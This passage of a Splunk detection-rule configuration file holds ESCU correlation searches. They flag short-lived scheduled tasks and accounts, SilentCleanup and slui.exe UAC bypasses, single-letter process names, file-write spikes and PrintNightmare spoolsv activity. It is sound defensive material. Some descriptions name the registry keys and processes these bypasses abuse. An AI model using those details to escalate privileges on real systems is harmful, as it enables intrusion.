auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. 
Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. 
action.notable.param.rule_title = Short Lived Scheduled Task action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 OR EventCode=4699 | xmlkv Message | transaction Task_Name startswith=(EventCode=4698) endswith=(EventCode=4699) | eval short_lived=case((duration<30),"TRUE") | search short_lived = TRUE | rename ComputerName as dest| table _time, dest, Account_Name, Command, Task_Name, short_lived | `short_lived_scheduled_task_filter` [ESCU - Short Lived Windows Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. 
The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. 
Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. action.escu.how_to_implement = This search requires you to have enabled your Group Management Audit Logs in your Local Windows Security Policy and be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/ action.escu.known_false_positives = It is possible that an administrator created and deleted an account in a short time period. Verifying activity with an administrator is advised. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Short Lived Windows Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A user account created or delete shortly in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Short Lived Windows Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 
action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. 
action.notable.param.rule_title = Short Lived Windows Accounts action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Changes.result_id) as result_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Change where All_Changes.result_id=4720 OR All_Changes.result_id=4726 by _time span=4h All_Changes.user All_Changes.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name("All_Changes")` | search result_id = 4720 result_id=4726 | transaction user connected=false maxspan=240m | table firstTime lastTime count user dest result_id | `short_lived_windows_accounts_filter` [ESCU - SilentCleanup UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - SilentCleanup UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible payload path $registry_value_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SilentCleanup UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest 
action.notable.param.rule_description = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.notable.param.rule_title = SilentCleanup UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\Environment\\windir" Registry.registry_value_data = "*.exe*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `silentcleanup_uac_bypass_filter` [ESCU - Single Letter Process On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. 
This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Single-letter executables are not always malicious. Investigate this activity with your normal incident-response process. action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Single Letter Process On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DHS Report TA18-074A"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ with single letter in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Single Letter Process On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. 
This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.notable.param.rule_title = Single Letter Process On Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest, Processes.user, Processes.process, Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | eval process_name_length = len(process_name), endExe = if(substr(process_name, -4) == ".exe", 1, 0) | search process_name_length=5 AND endExe=1 | table count, firstTime, lastTime, dest, user, process, process_name | `single_letter_process_on_endpoint_filter` [ESCU - SLUI RunAs Elevated - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives should be present as this is not commonly used by legitimate applications. 
action.escu.creation_date = 2021-05-13 action.escu.modification_date = 2021-05-13 action.escu.confidence = high action.escu.full_search_name = ESCU - SLUI RunAs Elevated - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = A slui process $process_name$ with elevated commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SLUI RunAs Elevated - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. 
action.notable.param.rule_title = SLUI RunAs Elevated action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=slui.exe (Processes.process=*-verb* Processes.process=*runas*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `slui_runas_elevated_filter` [ESCU - SLUI Spawning a Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have lead to the bypass. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. 
The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have led to the bypass.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Certain applications may spawn from `slui.exe` that are legitimate. Filtering will be needed to ensure proper monitoring.
action.escu.creation_date = 2021-05-13
action.escu.modification_date = 2021-05-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - SLUI Spawning a Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkSide Ransomware", "Windows Defense Evasion Tactics"]
action.risk = 1
action.risk.param._risk_message = A slui process $parent_process_name$ spawning child process $process_name$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - SLUI Spawning a Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with a publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have led to the bypass.
action.notable.param.rule_title = SLUI Spawning a Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=slui.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `slui_spawning_a_process_filter`

[ESCU - Spike in File Writes - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search looks for a sharp increase in the number of files written to a particular host.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for a sharp increase in the number of files written to a particular host.
action.escu.how_to_implement = In order to implement this search, you must populate the Endpoint file-system data model node. This is typically populated via an endpoint detection and response product, such as Carbon Black, or endpoint data sources such as Sysmon.
The data used for this search is typically generated via logs that report reads and writes to the file system.
action.escu.known_false_positives = It is important to understand that if you happen to install any new applications on your hosts or are copying a large number of files, you can expect to see a large increase in file modifications.
action.escu.creation_date = 2020-03-16
action.escu.modification_date = 2020-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spike in File Writes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Spike in File Writes - Rule
action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.action=created by _time span=1h, Filesystem.dest | `drop_dm_object_name(Filesystem)` | eventstats max(_time) as maxtime | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@d"), count, null))) as "count" avg(eval(if(_time<relative_time(maxtime, "-1d@d"), count, null))) as avg stdev(eval(if(_time<relative_time(maxtime, "-1d@d"), count, null))) as stdev by "dest" | eval upperBound=(avg+stdev*4), isOutlier=if((count > upperBound) AND num_data_samples >=20, 1, 0) | search isOutlier=1 | `spike_in_file_writes_filter`

[ESCU - Spoolsv Spawning Rundll32 - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product.
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives have been identified. There are limited instances where `rundll32.exe` may be spawned by a legitimate print driver.
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spoolsv Spawning Rundll32 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = $parent_process_name$ has spawned $process_name$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Spoolsv Spawning Rundll32 - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.notable.param.rule_title = Spoolsv Spawning Rundll32
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_spawning_rundll32_filter`

[ESCU - Spoolsv Suspicious Loaded Modules - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects suspicious loading of DLLs from a specific path related to PrintNightmare exploitation. It looks for the modules loaded by spoolsv.exe after the exploitation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects suspicious loading of DLLs from a specific path related to PrintNightmare exploitation. It looks for the modules loaded by spoolsv.exe after the exploitation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and loaded image (ImageLoaded) events from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spoolsv Suspicious Loaded Modules - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = $Image$ with process id $ProcessId$ has loaded a driver from $ImageLoaded$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Spoolsv Suspicious Loaded Modules - Rule
